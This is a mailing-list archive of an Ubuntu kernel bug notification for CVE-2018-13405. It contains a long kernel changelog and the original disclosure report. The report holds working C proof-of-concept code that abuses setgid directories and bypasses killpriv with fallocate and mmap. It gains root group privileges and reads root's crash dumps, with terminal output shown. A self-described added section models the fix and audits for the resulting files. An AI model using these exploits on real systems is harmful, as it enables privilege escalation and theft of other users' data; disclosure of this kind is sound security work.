
group.of.nepali.translators team mailing list archive

[Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass


This bug was fixed in the package linux - 4.4.0-134.160

---------------
linux (4.4.0-134.160) xenial; urgency=medium

  * linux: 4.4.0-134.160 -proposed tracker (LP: #1787177)

  * locking sockets broken due to missing AppArmor socket mediation patches
    (LP: #1780227)
    - UBUNTU SAUCE: apparmor: fix apparmor mediating locking non-fs, unix sockets

  * Backport namespaced fscaps to xenial 4.4 (LP: #1778286)
    - Introduce v3 namespaced file capabilities
    - commoncap: move assignment of fs_ns to avoid null pointer dereference
    - capabilities: fix buffer overread on very short xattr
    - commoncap: Handle memory allocation failure.

  * Xenial update to 4.4.140 stable release (LP: #1784409)
    - usb: cdc_acm: Add quirk for Uniden UBC125 scanner
    - USB: serial: cp210x: add CESINEL device ids
    - USB: serial: cp210x: add Silicon Labs IDs for Windows Update
    - n_tty: Fix stall at n_tty_receive_char_special().
    - staging: android: ion: Return an ERR_PTR in ion_map_kernel
    - n_tty: Access echo_* variables carefully.
    - x86/boot: Fix early command-line parsing when matching at end
    - ath10k: fix rfc1042 header retrieval in QCA4019 with eth decap mode
    - i2c: rcar: fix resume by always initializing registers before transfer
    - ipv4: Fix error return value in fib_convert_metrics()
    - kprobes/x86: Do not modify singlestep buffer while resuming
    - nvme-pci: initialize queue memory before interrupts
    - netfilter: nf_tables: use WARN_ON_ONCE instead of BUG_ON in nft_do_chain()
    - ARM: dts: imx6q: Use correct SDMA script for SPI5 core
    - ubi: fastmap: Correctly handle interrupted erasures in EBA
    - mm: hugetlb: yield when prepping struct pages
    - tracing: Fix missing return symbol in function_graph output
    - scsi: sg: mitigate read/write abuse
    - s390: Correct register corruption in critical section cleanup
    - drbd: fix access after free
    - cifs: Fix infinite loop when using hard mount option
    - jbd2: don't mark block as modified if the handle is out of credits
    - ext4: make sure bitmaps and the inode table don't overlap with bg
      descriptors
    - ext4: always check block group bounds in ext4_init_block_bitmap()
    - ext4: only look at the bg_flags field if it is valid
    - ext4: verify the depth of extent tree in ext4_find_extent()
    - ext4: include the illegal physical block in the bad map ext4_error msg
    - ext4: clear i_data in ext4_inode_info when removing inline data
    - ext4: add more inode number paranoia checks
    - ext4: add more mount time checks of the superblock
    - ext4: check superblock mapped prior to committing
    - HID: i2c-hid: Fix "incomplete report" noise
    - HID: hiddev: fix potential Spectre v1
    - HID: debug: check length before copy_to_user()
    - x86/mce: Detect local MCEs properly
    - x86/mce: Fix incorrect "Machine check from unknown source" message
    - media: cx25840: Use subdev host data for PLL override
    - mm, page_alloc: do not break __GFP_THISNODE by zonelist reset
    - dm bufio: avoid sleeping while holding the dm_bufio lock
    - dm bufio: drop the lock when doing GFP_NOIO allocation
    - mtd: rawnand: mxc: set spare area size register explicitly
    - dm bufio: don't take the lock in dm_bufio_shrink_count
    - mtd: cfi_cmdset_0002: Change definition naming to retry write operation
    - mtd: cfi_cmdset_0002: Change erase functions to retry for error
    - mtd: cfi_cmdset_0002: Change erase functions to check chip good only
    - netfilter: nf_log: don't hold nf_log_mutex during user access
    - staging: comedi: quatech_daqp_cs: fix no-op loop daqp_ao_insn_write()
    - Linux 4.4.140

  * Xenial update to 4.4.139 stable release (LP: #1784382)
    - xfrm6: avoid potential infinite loop in _decode_session6()
    - netfilter: ebtables: handle string from userspace with care
    - ipvs: fix buffer overflow with sync daemon and service
    - atm: zatm: fix memcmp casting
    - net: qmi_wwan: Add Netgear Aircard 779S
    - net/sonic: Use dma_mapping_error()
    - Revert "Btrfs: fix scrub to repair raid6 corruption"
    - tcp: do not overshoot window_clamp in tcp_rcv_space_adjust()
    - Btrfs: make raid6 rebuild retry more
    - usb: musb: fix remote wakeup racing with suspend
    - bonding: re-evaluate force_primary when the primary slave name changes
    - tcp: verify the checksum of the first data segment in a new connection
    - ext4: update mtime in ext4_punch_hole even if no blocks are released
    - ext4: fix fencepost error in check for inode count overflow during resize
    - driver core: Don't ignore class_dir_create_and_add() failure.
    - btrfs: scrub: Don't use inode pages for device replace
    - ALSA: hda - Handle kzalloc() failure in snd_hda_attach_pcm_stream()
    - ALSA: hda: add dock and led support for HP EliteBook 830 G5
    - ALSA: hda: add dock and led support for HP ProBook 640 G4
    - cpufreq: Fix new policy initialization during limits updates via sysfs
    - libata: zpodd: make arrays cdb static, reduces object code size
    - libata: zpodd: small read overflow in eject_tray()
    - libata: Drop SanDisk SD7UB3Q*G1001 NOLPM quirk
    - w1: mxc_w1: Enable clock before calling clk_get_rate() on it
    - x86/spectre_v1: Disable compiler optimizations over
      array_index_mask_nospec()
    - m68k/mm: Adjust VM area to be unmapped by gap size for __iounmap()
    - serial: sh-sci: Use spin_{try}lock_irqsave instead of open coding version
    - signal/xtensa: Consistenly use SIGBUS in do_unaligned_user
    - usb: do not reset if a low-speed or full-speed device timed out
    - 1wire: family module autoload fails because of upper/lower case mismatch.
    - ASoC: dapm: delete dapm_kcontrol_data paths list before freeing it
    - ASoC: cirrus: i2s: Fix LRCLK configuration
    - ASoC: cirrus: i2s: Fix {TX|RX}LinCtrlData setup
    - lib/vsprintf: Remove atomic-unsafe support for %pCr
    - mips: ftrace: fix static function graph tracing
    - branch-check: fix long->int truncation when profiling branches
    - ipmi:bt: Set the timeout before doing a capabilities check
    - Bluetooth: hci_qca: Avoid missing rampatch failure with userspace fw loader
    - fuse: atomic_o_trunc should truncate pagecache
    - fuse: don't keep dead fuse_conn at fuse_fill_super().
    - fuse: fix control dir setup and teardown
    - powerpc/mm/hash: Add missing isync prior to kernel stack SLB switch
    - powerpc/ptrace: Fix setting 512B aligned breakpoints with
      PTRACE_SET_DEBUGREG
    - powerpc/ptrace: Fix enforcement of DAWR constraints
    - cpuidle: powernv: Fix promotion from snooze if next state disabled
    - powerpc/fadump: Unregister fadump on kexec down path.
    - ARM: 8764/1: kgdb: fix NUMREGBYTES so that gdb_regs[] is the correct size
    - of: unittest: for strings, account for trailing \0 in property length field
    - IB/qib: Fix DMA api warning with debug kernel
    - RDMA/mlx4: Discard unknown SQP work requests
    - mtd: cfi_cmdset_0002: Change write buffer to check correct value
    - mtd: cfi_cmdset_0002: Use right chip in do_ppb_xxlock()
    - mtd: cfi_cmdset_0002: fix SEGV unlocking multiple chips
    - mtd: cfi_cmdset_0002: Fix unlocking requests crossing a chip boudary
    - mtd: cfi_cmdset_0002: Avoid walking all chips when unlocking.
    - MIPS: BCM47XX: Enable 74K Core ExternalSync for PCIe erratum
    - PCI: pciehp: Clear Presence Detect and Data Link Layer Status Changed on
      resume
    - MIPS: io: Add barrier after register read in inX()
    - time: Make sure jiffies_to_msecs() preserves non-zero time periods
    - Btrfs: fix clone vs chattr NODATASUM race
    - iio:buffer: make length types match kfifo types
    - scsi: qla2xxx: Fix setting lower transfer speed if GPSC fails
    - scsi: zfcp: fix missing SCSI trace for result of eh_host_reset_handler
    - scsi: zfcp: fix missing SCSI trace for retry of abort / scsi_eh TMF
    - scsi: zfcp: fix misleading REC trigger trace where erp_action setup failed
    - scsi: zfcp: fix missing REC trigger trace on terminate_rport_io early return
    - scsi: zfcp: fix missing REC trigger trace on terminate_rport_io for
      ERP_FAILED
    - scsi: zfcp: fix missing REC trigger trace for all objects in ERP_FAILED
    - scsi: zfcp: fix missing REC trigger trace on enqueue without ERP thread
    - linvdimm, pmem: Preserve read-only setting for pmem devices
    - md: fix two problems with setting the "re-add" device state.
    - ubi: fastmap: Cancel work upon detach
    - UBIFS: Fix potential integer overflow in allocation
    - xfrm: skip policies marked as dead while rehashing
    - backlight: as3711_bl: Fix Device Tree node lookup
    - backlight: max8925_bl: Fix Device Tree node lookup
    - backlight: tps65217_bl: Fix Device Tree node lookup
    - mfd: intel-lpss: Program REMAP register in PIO mode
    - perf tools: Fix symbol and object code resolution for vdso32 and vdsox32
    - perf intel-pt: Fix sync_switch INTEL_PT_SS_NOT_TRACING
    - perf intel-pt: Fix decoding to accept CBR between FUP and corresponding TIP
    - perf intel-pt: Fix MTC timing after overflow
    - perf intel-pt: Fix "Unexpected indirect branch" error
    - perf intel-pt: Fix packet decoding of CYC packets
    - media: v4l2-compat-ioctl32: prevent go past max size
    - media: dvb_frontend: fix locking issues at dvb_frontend_get_event()
    - nfsd: restrict rd_maxcount to svc_max_payload in nfsd_encode_readdir
    - NFSv4: Fix possible 1-byte stack overflow in
      nfs_idmap_read_and_verify_message
    - video: uvesafb: Fix integer overflow in allocation
    - Input: elan_i2c - add ELAN0618 (Lenovo v330 15IKB) ACPI ID
    - xen: Remove unnecessary BUG_ON from __unbind_from_irq()
    - udf: Detect incorrect directory size
    - Input: elan_i2c_smbus - fix more potential stack buffer overflows
    - Input: elantech - enable middle button of touchpads on ThinkPad P52
    - Input: elantech - fix V4 report decoding for module with middle key
    - ALSA: hda/realtek - Add a quirk for FSC ESPRIMO U9210
    - Btrfs: fix unexpected cow in run_delalloc_nocow
    - spi: Fix scatterlist elements size in spi_map_buf
    - block: Fix transfer when chunk sectors exceeds max
    - dm thin: handle running out of data space vs concurrent discard
    - cdc_ncm: avoid padding beyond end of skb
    - Bluetooth: Fix connection if directed advertising and privacy is used
    - Linux 4.4.139

  * Support AverMedia DVD EZMaker 7 USB video capture dongle (LP: #1620762) //
    Xenial update to 4.4.139 stable release (LP: #1784382)
    - media: cx231xx: Add support for AverMedia DVD EZMaker 7

  * vfio/pci: cannot assign a i40e pf device to a vm using vfio-pci
    (LP: #1779830)
    - vfio/pci: Hide broken INTx support from user

  * Kernel error "task zfs:pid blocked for more than 120 seconds" (LP: #1781364)
    - SAUCE: (noup) zfs to 0.6.5.6-0ubuntu25

  * Allow multiple mounts of zfs datasets (LP: #1759848)
    - SAUCE: Allow mounting datasets more than once (LP: #1759848)

  * CVE-2018-12233
    - jfs: Fix inconsistency between memory allocation and ea_buf->max_size

  * Redpine: Observed kernel panic while running wireless tests in regression
    mode (LP: #1773410) // Redpine: Observed kernel panic while running soft-ap
    tests (LP: #1777850)
    - SAUCE: Redpine: improve cancel_hw_scan handling to fix kernel panic

  * [HMS] Upgrades to Support SocketCAN over USB on Dell IoT 300x Gateways
    (LP: #1783241)
    - SAUCE: (no-up) upgrade IXXAT USB SocketCAN driver

  * CVE-2018-13094
    - xfs: don't call xfs_da_shrink_inode with NULL bp

  * other users' coredumps can be read via setgid directory and killpriv bypass
    (LP: #1779923) // CVE-2018-13405
    - Fix up non-directory creation in SGID directories

  * snapcraft.yaml: missing ubuntu-retpoline-extract-one script breaks the build
    (LP: #1782116)
    - snapcraft.yaml: copy retpoline-extract-one to scripts before build

  * Enable basic support for Solarflare 8000 series NIC (LP: #1783152)
    - sfc: make TSO version a per-queue parameter
    - sfc: Add PCI ID for Solarflare 8000 series 10/40G NIC

  * Redpine: Observed kernel panic while running wireless regressions tests
    (LP: #1777858)
    - SAUCE: Redpine: improve kernel thread handling to fix kernel panic

  * Xenial update to 4.4.138 stable release (LP: #1777389)
    - x86: Remove unused function cpu_has_ht_siblings()
    - x86/cpufeature: Remove unused and seldomly used cpu_has_xx macros
    - x86/fpu: Disable AVX when eagerfpu is off
    - x86/fpu: Revert ("x86/fpu: Disable AVX when eagerfpu is off")
    - x86/fpu: Hard-disable lazy FPU mode
    - af_key: Always verify length of provided sadb_key
    - x86/crypto, x86/fpu: Remove X86_FEATURE_EAGER_FPU #ifdef from the crc32c
      code
    - gpio: No NULL owner
    - Clarify (and fix) MAX_LFS_FILESIZE macros
    - serial: samsung: fix maxburst parameter for DMA transactions
    - vmw_balloon: fixing double free when batching mode is off
    - Input: goodix - add new ACPI id for GPD Win 2 touch screen
    - crypto: vmx - Remove overly verbose printk from AES init routines
    - Linux 4.4.138

  * Redpine: wifi-ap stopped working after restart (LP: #1773400)
    - SAUCE: Redpine: fix soft-ap invisible issue

  * Xenial update to 4.4.137 stable release (LP: #1777063)
    - tpm: do not suspend/resume if power stays on
    - tpm: self test failure should not cause suspend to fail
    - mmap: introduce sane default mmap limits
    - mmap: relax file size limit for regular files
    - kconfig: Avoid format overflow warning from GCC 8.1
    - xfs: fix incorrect log_flushed on fsync
    - drm: set FMODE_UNSIGNED_OFFSET for drm files
    - brcmfmac: Fix check for ISO3166 code
    - bnx2x: use the right constant
    - dccp: don't free ccid2_hc_tx_sock struct in dccp_disconnect()
    - enic: set DMA mask to 47 bit
    - ip6mr: only set ip6mr_table from setsockopt when ip6mr_new_table succeeds
    - ipv4: remove warning in ip_recv_error
    - isdn: eicon: fix a missing-check bug
    - netdev-FAQ: clarify DaveM's position for stable backports
    - net/packet: refine check for priv area size
    - net: usb: cdc_mbim: add flag FLAG_SEND_ZLP
    - packet: fix reserve calculation
    - qed: Fix mask for physical address in ILT entry
    - net/mlx4: Fix irq-unsafe spinlock usage
    - team: use netdev_features_t instead of u32
    - rtnetlink: validate attributes in do_setlink()
    - net: phy: broadcom: Fix bcm_write_exp()
    - net: metrics: add proper netlink validation
    - Linux 4.4.137

  * Xenial update to 4.4.136 stable release (LP: #1776177)
    - arm64: lse: Add early clobbers to some input/output asm operands
    - powerpc/64s: Clear PCR on boot
    - USB: serial: cp210x: use tcflag_t to fix incompatible pointer type
    - sh: New gcc support
    - xfs: detect agfl count corruption and reset agfl
    - Input: elan_i2c_smbus - fix corrupted stack
    - tracing: Fix crash when freeing instances with event triggers
    - selinux: KASAN: slab-out-of-bounds in xattr_getsecurity
    - cfg80211: further limit wiphy names to 64 bytes
    - rtlwifi: rtl8192cu: Remove variable self-assignment in rf.c
    - ASoC: Intel: sst: remove redundant variable dma_dev_name
    - irda: fix overly long udelay()
    - tcp: avoid integer overflows in tcp_rcv_space_adjust()
    - i2c: rcar: make sure clocks are on when doing clock calculation
    - i2c: rcar: rework hw init
    - i2c: rcar: remove unused IOERROR state
    - i2c: rcar: remove spinlock
    - i2c: rcar: refactor setup of a msg
    - i2c: rcar: init new messages in irq
    - i2c: rcar: don't issue stop when HW does it automatically
    - i2c: rcar: check master irqs before slave irqs
    - i2c: rcar: revoke START request early
    - dmaengine: usb-dmac: fix endless loop in usb_dmac_chan_terminate_all()
    - iio:kfifo_buf: check for uint overflow
    - MIPS: ptrace: Fix PTRACE_PEEKUSR requests for 64-bit FGRs
    - MIPS: prctl: Disallow FRE without FR with PR_SET_FP_MODE requests
    - scsi: scsi_transport_srp: Fix shost to rport translation
    - stm class: Use vmalloc for the master map
    - hwtracing: stm: fix build error on some arches
    - drm/i915: Disable LVDS on Radiant P845
    - Kbuild: change CC_OPTIMIZE_FOR_SIZE definition
    - [Config] Add CONFIG_CC_OPTIMIZE_FOR_PERFORMANCE=y
    - fix io_destroy()/aio_complete() race
    - mm: fix the NULL mapping case in __isolate_lru_page()
    - sparc64: Fix build warnings with gcc 7.
    - Linux 4.4.136

  * Xenial update to 4.4.135 stable release (LP: #1776158)
    - Revert "vti4: Don't override MTU passed on link creation via IFLA_MTU"
    - Linux 4.4.135

 -- Kleber Sacilotto de Souza <kleber.souza@xxxxxxxxxxxxx>  Wed, 15 Aug 2018 13:51:11 +0000

** Changed in: linux (Ubuntu Xenial)
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1779923

Title:
  other users' coredumps can be read via setgid directory and killpriv
  bypass

Status in linux package in Ubuntu:
  In Progress
Status in linux source package in Trusty:
  Fix Committed
Status in linux source package in Xenial:
  Fix Released
Status in linux source package in Bionic:
  Fix Released
Status in linux source package in Cosmic:
  In Progress

Bug description:
  Note: I am both sending this bug report to security@xxxxxxxxxx and filing it in
  the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
  or as an Ubuntu bug. You may wish to talk to each other to determine the best
  place to fix this.

  I noticed halfdog's old writeup at
  https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/,
  describing essentially the following behavior in combination with a
  trick for then writing to the resulting file without triggering the
  killpriv logic:

  
  =============
  user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
  user@debian:~/sgid_demo$ cat > demo.c
  #include <fcntl.h>
  int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
  user@debian:~/sgid_demo$ gcc -o demo demo.c
  user@debian:~/sgid_demo$ ./demo
  user@debian:~/sgid_demo$ ls -l dir/file
  -rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
  =============

  
  Two patches for this were proposed on LKML back then:
  "[PATCH 1/2] fs: Check f_cred instead of current's creds in
  should_remove_suid()"
  https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.luto@xxxxxxxxxx/

  "[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
  https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.luto@xxxxxxxxxx/

  However, as far as I can tell, neither of them actually landed.

  
  You can also bypass the killpriv logic with fallocate() and mmap() -
  fallocate() permits resizing the file without triggering killpriv,
  mmap() permits writing without triggering killpriv (the mmap part is mentioned
  at
  https://lore.kernel.org/lkml/CAGXu5jLu6OGkQUgqRcOyQ6DABOwZ9HX3fUQ+-zC7NjLukGKnVw@xxxxxxxxxxxxxx/
  ):

  
  =============
  user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
  user@debian:~/sgid_demo$ cat fallocate.c
  #define _GNU_SOURCE
  #include <stdlib.h>
  #include <fcntl.h>
  #include <err.h>
  #include <sys/mman.h>
  #include <sys/stat.h>
  #include <unistd.h>
  #include <string.h>

  int main(void) {
    int src_fd = open("/usr/bin/id", O_RDONLY);
    if (src_fd == -1)
      err(1, "open 2");
    struct stat src_stat;
    if (fstat(src_fd, &src_stat))
      err(1, "fstat");
    int src_len = src_stat.st_size;
    char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
    if (src_mapping == MAP_FAILED)
      err(1, "mmap 2");

    int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
    if (fd == -1)
      err(1, "open");
    if (fallocate(fd, 0, 0, src_len))
      err(1, "fallocate");
    char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    if (mapping == MAP_FAILED)
      err(1, "mmap");

  
    memcpy(mapping, src_mapping, src_len);

    munmap(mapping, src_len);
    close(fd);
    close(src_fd);

    execl("./dir/file", "id", NULL);
    err(1, "execl");
  }
  user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
  user@debian:~/sgid_demo$ ./fallocate
  uid=1000(user) gid=1000(user) egid=0(root)
  groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
  =============

  
  sys_copy_file_range() also looks as if it bypasses killpriv on
  supported filesystems, but I haven't tested that one so far.

  On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
  contains group-readable crashdumps in some custom format, so you can use this
  issue to steal other users' crashdumps:

  
  =============
  user@ubuntu-18-04-vm:~$ ls -l /var/crash
  total 296
  -rw-r----- 1 user whoopsie  16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
  -rw-r----- 1 root whoopsie  50706 Jun 25 21:51 _usr_bin_id.0.crash
  -rw-r----- 1 user whoopsie  51842 Jun 25 21:42 _usr_bin_id.1000.crash
  -rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
  -rw-r----- 1 root whoopsie  18765 Jun 26 00:42 _usr_bin_xattr.0.crash
  user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
  cat: /var/crash/_usr_bin_id.0.crash: Permission denied
  user@ubuntu-18-04-vm:~$ cat fallocate.c 
  #define _GNU_SOURCE
  #include <stdio.h>
  #include <stdlib.h>
  #include <fcntl.h>
  #include <err.h>
  #include <sys/mman.h>
  #include <sys/stat.h>
  #include <unistd.h>
  #include <string.h>

  int main(int argc, char **argv) {
    if (argc != 2) {
      printf("usage: ./fallocate <file_to_read>");
      return 1;
    }
    int src_fd = open("/bin/cat", O_RDONLY);
    if (src_fd == -1)
      err(1, "open 2");
    struct stat src_stat;
    if (fstat(src_fd, &src_stat))
      err(1, "fstat");
    int src_len = src_stat.st_size;
    char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
    if (src_mapping == MAP_FAILED)
      err(1, "mmap 2");

    unlink("/var/crash/privileged_cat"); /* in case we've already run before */
    int fd = open("/var/crash/privileged_cat", O_RDWR|O_CREAT|O_EXCL, 02755);
    if (fd == -1)
      err(1, "open");
    if (fallocate(fd, 0, 0, src_len))
      err(1, "fallocate");
    char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    if (mapping == MAP_FAILED)
      err(1, "mmap");
    memcpy(mapping, src_mapping, src_len);
    munmap(mapping, src_len);
    close(fd);

    execl("/var/crash/privileged_cat", "cat", argv[1], NULL);
    err(1, "execl");
  }
  user@ubuntu-18-04-vm:~$ gcc -o fallocate fallocate.c
  user@ubuntu-18-04-vm:~$ ./fallocate /var/crash/_usr_bin_id.0.crash > /var/crash/_usr_bin_id.0.crash.stolen
  user@ubuntu-18-04-vm:~$ ls -l /var/crash
  total 384
  -rwxr-sr-x 1 user whoopsie  35064 Jul  3 19:22 privileged_cat
  -rw-r----- 1 user whoopsie  16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
  -rw-r----- 1 root whoopsie  50706 Jun 25 21:51 _usr_bin_id.0.crash
  -rw-r--r-- 1 user whoopsie  50706 Jul  3 19:22 _usr_bin_id.0.crash.stolen
  -rw-r----- 1 user whoopsie  51842 Jun 25 21:42 _usr_bin_id.1000.crash
  -rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
  -rw-r----- 1 root whoopsie  18765 Jun 26 00:42 _usr_bin_xattr.0.crash
  user@ubuntu-18-04-vm:~$ mkdir root_crash_unpacked
  user@ubuntu-18-04-vm:~$ # work around bug in apport-unpack
  user@ubuntu-18-04-vm:~$ sed -i 's|^UserGroups: $|UserGroups: 0|' /var/crash/_usr_bin_id.0.crash.stolen
  user@ubuntu-18-04-vm:~$ apport-unpack /var/crash/_usr_bin_id.0.crash.stolen root_crash_unpacked/
  user@ubuntu-18-04-vm:~$ file root_crash_unpacked/CoreDump 
  root_crash_unpacked/CoreDump: ELF 64-bit LSB core file x86-64, version 1 (SYSV), SVR4-style, from 'id', real uid: 0, effective uid: 0, real gid: 0, effective gid: 0, execfn: '/usr/bin/id', platform: 'x86_64'
  =============

  
  This bug is subject to a 90 day disclosure deadline. After 90 days elapse
  or a patch has been made broadly available (whichever is earlier), the bug
  report will become visible to the public.
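The following is an added example, not code from the bug report or from the kernel. It models the mode decision that the changelog entry "Fix up non-directory creation in SGID directories" adds to inode creation (a non-directory created in a setgid directory by someone outside that group loses a requested setgid bit), and pairs it with a small audit that scans a directory such as /var/crash for the artefact the report leaves behind: a user-owned, group-executable setgid file carrying the group of a writable setgid directory. Function names, the 4096-byte path buffer and the gid values used in the checks are constructed for this example.

```c
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Mode a newly created inode ends up with inside a directory of mode
 * dir_mode (hypothetical helper modelling the fixed kernel behaviour).
 * In a setgid directory the new inode inherits the directory's group;
 * a subdirectory also inherits S_ISGID; a non-directory keeps a requested
 * S_ISGID|S_IXGRP only when the creator is a member of that group or holds
 * CAP_FSETID.  Before the fix that last rule did not exist, which is what
 * the demo.c in the report relies on. */
mode_t sgid_dir_create_mode(mode_t dir_mode, mode_t req_mode,
                            int creator_in_dir_group, int has_cap_fsetid)
{
    if (!(dir_mode & S_ISGID))
        return req_mode;             /* group is the creator's own fsgid */
    if (S_ISDIR(req_mode))
        return req_mode | S_ISGID;   /* setgid propagates to subdirectories */
    if ((req_mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)
        && !creator_in_dir_group && !has_cap_fsetid)
        return req_mode & ~S_ISGID;  /* the fix: drop setgid for outsiders */
    return req_mode;                 /* S_ISGID without S_IXGRP is mandatory locking */
}

/* Audit predicate: a non-root-owned, group-executable setgid non-directory
 * whose group matches a group- or world-writable setgid directory is the
 * shape of "privileged_cat" in the report. */
int sgid_file_in_shared_dir(mode_t dir_mode, gid_t dir_gid,
                            mode_t file_mode, uid_t file_uid, gid_t file_gid)
{
    if (!S_ISDIR(dir_mode) || !(dir_mode & S_ISGID) ||
        !(dir_mode & (S_IWGRP | S_IWOTH)))
        return 0;
    if (S_ISDIR(file_mode) ||
        (file_mode & (S_ISGID | S_IXGRP)) != (S_ISGID | S_IXGRP))
        return 0;
    return file_uid != 0 && file_gid == dir_gid;
}

/* Scan one directory (non-recursive, like /var/crash) and print matches.
 * Returns the number of suspicious entries, or -1 if it cannot be read. */
int audit_sgid_dir(const char *dir)
{
    struct stat dst, fst;
    char path[4096];
    int found = 0;
    if (stat(dir, &dst) != 0)
        return -1;
    DIR *d = opendir(dir);
    if (!d)
        return -1;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        if (snprintf(path, sizeof path, "%s/%s", dir, e->d_name) >= (int)sizeof path)
            continue;                /* path too long for the buffer: skip */
        if (stat(path, &fst) != 0)
            continue;
        if (sgid_file_in_shared_dir(dst.st_mode, dst.st_gid,
                                    fst.st_mode, fst.st_uid, fst.st_gid)) {
            printf("suspicious setgid file: %s (mode %04o uid %u gid %u)\n",
                   path, (unsigned)(fst.st_mode & 07777),
                   (unsigned)fst.st_uid, (unsigned)fst.st_gid);
            found++;
        }
    }
    closedir(d);
    return found;
}

int main(int argc, char **argv)
{
    int n = audit_sgid_dir(argc > 1 ? argv[1] : "/var/crash");
    if (n < 0) { perror("audit_sgid_dir"); return 1; }
    printf("%d suspicious entr%s\n", n, n == 1 ? "y" : "ies");
    return 0;
}
```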

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1779923/+subscriptions